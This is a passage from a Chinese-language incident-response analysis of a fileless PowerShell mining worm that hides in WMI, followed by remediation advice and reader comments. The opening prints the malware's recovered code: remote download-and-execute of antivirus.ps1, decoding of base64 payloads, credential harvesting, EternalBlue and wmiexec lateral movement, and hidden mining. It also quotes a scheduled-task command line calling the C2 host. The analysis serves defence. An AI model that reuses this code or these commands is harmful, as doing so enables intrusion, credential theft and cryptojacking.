if (($avgs[0] -le$avgs[1]) -and ($avgs[0] -ne 0)){

$nic = $se[0]

break

}else{

$nic = $se[1]

break

}

if ($i -eq 2){

if (($avgs[2] -le 300) -and($avgs[2] -ne 0)){

$nic = $se[2]

break

}

if ($i -eq 3){

if ($avgs[3] -ne 0){

if (($avgs[2] -le$avgs[3]) -and ($avgs[2] -ne 0)){

$nic = $se[2]

break

}else{

$nic = $se[3]

break

}

//如果服務端版本不等於本地端版本，則下載服務端的antivirus.ps1

$nic=$nic+(':'+'443')

$ver=(New-ObjectNet.WebClient).DownloadString("http://$nic/ver.txt").Trim()

if($ver -ne $null){

$ver_tmp=([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ver'].Value

if($ver -ne $ver_tmp){

IEX (New-ObjectNet.WebClient).DownloadString("http://$nic/antivirus.ps1")

return

}

//獲取開機時間並進行定義

$stime=[Environment]::TickCount

//執行WmiClass裏root\default:System_Anti_Virus_Core-"funs"屬性內容，釋放WMI exec和永恆之藍攻擊代碼

$funs = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['funs'].Value

$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

iex $defun

//在wmi對象裏查找root\subscription空間，定位windows系統日誌，刪除

Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription |Where-Object {$_.filter -notmatch 'Windows Events'} |Remove-WmiObject

//按cpu大小遞減方式逐個獲取powershell.exe進程ID

[array]$psids= get-process -name powershell |sort cpu -Descending|ForEach-Object {$_.id}

$tcpconn = netstat -anop tcp

$exist=$False

//判斷本機是否在給自己挖礦，例如已運行的powershell.exe和外部地址的80或14444或14433端口是否有已建立的TCP連接，否則循環

if ($psids -ne $null )

{

foreach ($t in $tcpconn)

{

$line =$t.split(' ')|?{$_}

if ($line -eq $null)

{continue}

if (($psids -contains$line[-1]) -and $t.contains("ESTABLISHED") -and($t.contains(":80 ") -or $t.contains(":14444") -or$t.contains(":14433")) )

{

$exist=$true

break

}

！！！

RunDDOS "cohernece.exe"

KillBot('System_Anti_Virus_Core')

//殺掉其他挖礦程序，例如與外部端口3333，55555，7777已建立連接的挖礦程序

foreach ($t in $tcpconn)

{

$line =$t.split(' ')|?{$_}

if (!($line -is[array])){continue}

if(($line[-3].contains(":3333") -or$line[-3].contains(":5555") -or$line[-3].contains(":7777")) -and$t.contains("ESTABLISHED"))

{

$evid=$line[-1]

Get-Process -id $evid| stop-process -force

}

//如果沒有挖礦，例如本機沒有連接外部14444或14433端口和已運行powershell.exe小於8個，執行WmiClass的root\default:System_Anti_Virus_Core-"mon"和"funs"屬性內容進行挖礦和內網滲透。

if (!$exist -and ($psids.count -le 8))

{

$cmdmon="powershell -NoP-NonI -W Hidden `"`$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;`$funs= ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value;iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(`$funs)));Invoke-Command -ScriptBlock `$RemoteScriptBlock-ArgumentList @(`$mon, `$mon, 'Void', 0, '', '')`""

$vbs = New-Object -ComObjectWScript.Shell

$vbs.run($cmdmon,0)

}

//取WmiClass的root\default:System_Anti_Virus_Core-"mimi"屬性內容賦給$mimi，並檢查長度是否32位，如果不是將該內容輸出至temp\a25hY2tlcmVk.txt文件

$NTLM=$False

$mimi = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['mimi'].Value

$a, $NTLM= Get-creds $mimi $mimi

if (($a -Split " ")[2].length -ne 32)

{

($a -Split " ")[2] |Out-File -Encoding ascii "$env:temp\a25hY2tlcmVk.txt"

}

$Networks = [System.Net.DNS]::GetHostByName($null).AddressList

//將"ipsu"屬性內容賦值給$ipsu

$ipsu = ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['ipsu'].Value

//將"i17"屬性內容賦值給$i17

$i17 = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['i17'].Value

//將"sc"屬性內容賦值給$scba

$scba= ([WmiClass]'root\default:System_Anti_Virus_Core').Properties['sc'].Value

//將"sc"屬性內容轉換成8位無符號整數數組

[byte[]]$sc=[System.Convert]::FromBase64String($scba)

foreach ($Network in $Networks)

{

//格式化IP地址

$IPAddress = $Network.IPAddressToString

//判斷自身IP地址是否爲空

if ($IPAddress -match'^169.254'){continue}

$SubnetMask = '255.255.255.0'

//將Get-networkrange到的IP和掩碼賦值給$ips_c

$ips_c=Get-networkrange$IPAddress $SubnetMask

//將Get-IpInB到的IP賦值給$ips_b

$ips_b=Get-IpInB $IPAddress

$ips=$ips_c+$ips_b

$tcpconn = netstat -anop tcp

//取tcp連接是已建立狀態且不包含127.0.0.1，並不是自己連自己，最後類似入棧行爲

foreach ($t in $tcpconn)

{

$line =$t.split(' ')|?{$_}

if (!($line -is[array])){continue}

if ($line.count -le4){continue}

//分割外部地址並只取IP

$i=$line[-3].split(':')[0]

//如果tcp連接是已建立狀態且不包含127.0.0.1，並不是自己連自己則繼續

if ( ($line[-2] -eq'ESTABLISHED') -and ($i -ne '127.0.0.1')-and ($ips -notcontains $i))

{

$ips+=$i

}

//如果開機時間小於1.5個小時則繼續

if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

foreach ($ip in $ips)

{

if(([Environment]::TickCount-$stime)/1000 -gt 5400){break}

if ($ip -eq$IPAddress){continue}

//MS17-010永恆之藍攻擊

if ((Test-Port $ip)-ne $false -and $ipsu -notcontains $ip)

{

$re=0

if ($a.count -ne 0)

{$re = test-ip -ip $ip-creds $a -nic $nic -ntlm $NTLM }

if ($re -eq 1){$ipsu=$ipsu +" "+$ip}

else

{

$vul=[PingCastle.Scanners.m17sc]::Scan($ip)

if ($vul -and $i17-notcontains $ip)

{

$res=eb7 $ip $sc

if (!($res -eq$true))

{eb8 $ip $sc}

$i17 = $i17 +" "+$ip

}

//賦值給staticClass

$StaticClass=New-ObjectManagement.ManagementClass('root\default:System_Anti_Virus_Core')

//wmiexec攻擊成功的失陷主機IP賦值給StaticClass的ipsu

$StaticClass.SetPropertyValue('ipsu' ,$ipsu)

//推送更新

$StaticClass.Put()

//永恆之藍攻擊成功將失陷主機IP賦值給StaticClass的i17

$StaticClass.SetPropertyValue('i17' ,$i17)

//推送更新

$StaticClass.Put()

2.8 powershell.exe（PID 3180）

內容和上一個powershell載荷重複，詳見目錄2.7。

2.9 WmiClass檢查

根據分析PID 3964內存中的內容，發現各種惡意內容都儲存在WMI root\default:System_Anti_Virus_Core中，如需要調用，也是直接加載到內存中執行，即實現本地無文件挖礦和內網滲透。

Windows自帶wbemtest.exe工具可以管理Windows Management Instrumentation。下拉框至最底部，發現PID 3964內存數據中存在的各個屬性。

2.9.1 ver屬性（由於不會代碼，以下部分內容從數據包層面進行功能驗證）

查詢DNS記錄，並ping測試服務端在線情況。

數據包顯示第一個動作即是驗證版本，如版本不一致即下載antivirus.ps1。

更新完成之後服務端和本地端版本一致。

服務端版本

本地版本

2.9.2 funs屬性

對funs內容進行解碼並上傳雲端進行殺毒。

2.9.3 ipsu/i17/mimi/sc屬性

ipsu和i17由於wmiexec和MS17-010沒有攻擊成功所以屬性沒有賦值。

mimi和sc由於技術有限，未繼續進行分析。

2.9.4 mon屬性

技術有限，未在代碼層面進行分析，PID 3180會釋放mon內容進行挖礦行爲。

2.9.5 內網滲透

根據PID 3964和PID 3180內存中的數據，分析兩個程序都會釋放funs內容以進行內網滲透。

從ARP層面判斷存活主機：

從TCP三次握手機制判斷目標範圍內的445端口是否開啓：

2.10 antivirus.ps1檢查

由於PID 3964 get該文件並加載到內存後沒有存儲行爲，且利用瀏覽器使用相同的請求頭部也無法下載該文件，導致無法繼續分析（後來發現在命令行中運行然後重定向到文件中即可對其進行分析）。根據該進程判斷該文件至少包括修改WmiClass、下載cohernece.exe等惡意程序的功能。

2.11 cohernece.exe檢查

該文件2019年1月12日1:30生成。

同目錄下還存在java-log-9527.log，經查閱資料，該文件是cohernece.exe的攻擊載荷。

2.12 關聯檢查

根據名稱進行搜索。發現多個目錄下存在該文件。如下圖紅框所示：

根據該文件生成時間進行搜索，同一時間在極其隱蔽的目錄下：

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\TemporaryInternet Files\Content.IE5

每隔20分鐘就會自動生成一個htm文件。

對其進行解碼，如下圖所示，按名稱理解主要作用於檢查版本或本地/雲端版本不一致時進行更新。

下載內容如下簡示：

由於其生成時間固定，查詢到任務計劃時發現惡意定時任務：

兩個任務計劃定時操作：

/u /s /i:http://update.7h4uk.com/antivirus.php scrobj.dll

如上鍊接測試無法下載，80替換443後可以下載。

2.13 Ioc

2.13.1 url

update.7h4uk.com

info.7h4uk.com

f4keu.7h4uk.com

xmr-eu1.nanopool.org

2.13.2 ip

185.234.217.139

185.234.217.111

111.90.145.52

151.80.144.25

51.255.34.118

51.15.65.182

164.132.109.110

213.32.29.143

51.15.54.102

51.15.78.68

5.196.13.29

217.182.169.148

5.196.23.240

2.13.3 md5

cohernece.exe 4fe2de6fbb278e56c23e90432f21f6c8

9527.log c2e31d4b8d6f9169d4557587b9d595ec

三、應急處置

根據現場情況經用戶溝通確認，通過內網主機進行以下工作完成了對惡意程序的清除：

1.任務計劃刪除定時任務；

2.按順序kill PID 3964、3180和cohernece.exe；

3.已在WMI中將root\default:System_Anti_Virus_Core的funs、i17、ipsu、mimi、mon、sc、ver屬性刪除；

4.已刪除cohernece.exe和antivirus*.htm。

四、基礎防護能力檢查

4.1 防火牆和MS17010

在本地未安裝MS17010相關補丁的情況下對外開放了445端口，且無第三方殺軟或應用層防火牆，本地網絡層防火牆未啓用，無法針對入棧訪問本地高危端口行爲進行訪問控制。

4.2 Tomcat日誌

Tomcat訪問日誌功能未啓用。

五、分析結論和處理建議

5.1 分析結論

本次內網主機CPU使用率過高經檢查是因爲存在挖礦行爲導致，由於tomcat未啓用訪問日誌記錄功能，未在WEB層面進行攻擊溯源。但根據目錄4.1的分析，完全可以通過目錄2中的惡意程序對內網防護不到位的主機實現自動化內網滲透。

5.2 處理建議

爲減少被惡意行爲取得管理權限後進行勒索或挖礦等發生安全事件的可能性，建議至少包括但不限於：

1.加強准入控制，訪問應用系統建議必須經過多層應用防護；

2.內網管理服務器建議必須經過堡壘機管控和審計，外網管理服務器建議必須通過VPN加密進入內網後再通過堡壘機進行管控和審計；

3.加強準出控制，建議對互聯網或對外提供服務的應用系統，在互聯網出口只做端口映射或雙向地址置換，如無必要，建議禁止互聯網出口代理應用系統的IP出互聯網；

4.應用系統建議經過代碼審計和滲透測試後再對互聯網或對外提供服務；

5.建議不要因爲是測試服務器而降低其安全標準，基於木桶原理，以防測試服務器發生安全事件被獲取權限從而可以橫向滲透內網，因此再次強調業務系統服務器如無必要，禁止主動訪問互聯網，以防獲取管理權限後反彈管理權限至互聯網；

6.辦公終端需預防U盤釣魚或交叉感染惡意程序，儘量不要打開來歷不明的文檔、程序、郵件中的附件，防止社工釣魚。

*本文原創作者：竹林再遇北極熊，本文屬於FreeBuf原創獎勵計劃，未經許可禁止轉載

竹林再遇北極熊 1 篇文章等級： 1級

上一篇：繞過防火牆過濾規則傳輸ICMP
下一篇：投遞惡意lnk使用JwsclTerminalServer實現遠程控制和信息獲取

發表評論

已有 10 條評論

123 2019-07-05 回覆 1樓

直接把winmgmt服務關了完事

亮了(1)
- langyajiekou (6級) 2019-07-05 回覆
  
  @ 123 有些管理需要，不能關停的。
  
  亮了(0)
- 竹林再遇北極熊 (1級) 安徽三實 2019-07-07 回覆
  
  winmgmt只是運行其的平臺，只要黑進來了該怎麼開還是在怎麼開，說到底還是您說的這個思路、這個安全意識必須要有，高危的，不是必須的，站在運維的角度或站在應急響應的角度，真心不建議對外開放或者運行，不然的話根本不會存在這樣的應急。
  
  亮了(0)
A-new (1級) 2019-07-05 回覆 2樓

powerghost，這個很久之前就有相關文章了

亮了(0)
- 竹林再遇北極熊 (1級) 安徽三實 2019-07-07 回覆
  
  首先，我特意搜了以下freebuf的“關於我們”，裏面的一些內容和本次回覆是不矛盾的，而且經過編輯審覈，肯定不會和其他文章重合。
  另外我老大很久之前和我們說過，會的問題自認爲肯定都是很簡單的，如果你處理過一個問題，是你不會的，處理成功對自己是一次提升；寫出來，是一次提升，說出來，說不通，或者別人問問題你不會，你搞懂了，又是一次提升。其目的就不單單是分享了，更多的還是提升自己。
  
  亮了(3)
Meloncn 2019-07-06 回覆 3樓

最近我們的集羣中也發現了這個東西

亮了(0)
- 竹林再遇北極熊 (1級) 安徽三實 2019-07-07 回覆
  
  “我們的集羣”說明不是運維就是甲方，成功需要千萬滴汗水組成，但是失敗只要一種因素，幸虧不是勒索，只是CPU高一點而已，不然領導公務再繁忙，眼裏也只裝的下事故兩個字。
  
  亮了(0)
熱心市民王先生 (1級) 2019-07-06 回覆 4樓

最近我們這邊集羣中也發現了這個東西，會掃描你的內網連接其他主機445端口，還會進行密碼爆破。（山東濰坊）

亮了(0)
- 竹林再遇北極熊 (1級) 安徽三實 2019-07-07 回覆
  
  單說一個掃描的話，有兩個地方需要注意，其中一個就是網關禁止，哪怕是超融合環境，虛擬化裏的也是有網關的，找到進行限制，不管是根據掃描特徵還是五元組都可以進行控制。其二就是服務器本地限制，因爲不跨網段不經過網關。另外服務器本地都可對登錄次數進行限制的。
  
  亮了(0)
一個摸索安全的人 2019-07-08 回覆 5樓

這個我們在甲方環境也發現了問題，主要是當時發現了定時任務，所以當時全局做了powershell的進程控制，然後再把計劃任務刪除掉，kill掉作者所述的這幾個進程，所以看到作者的覆盤讓我加深了印象，謝謝！

亮了(0)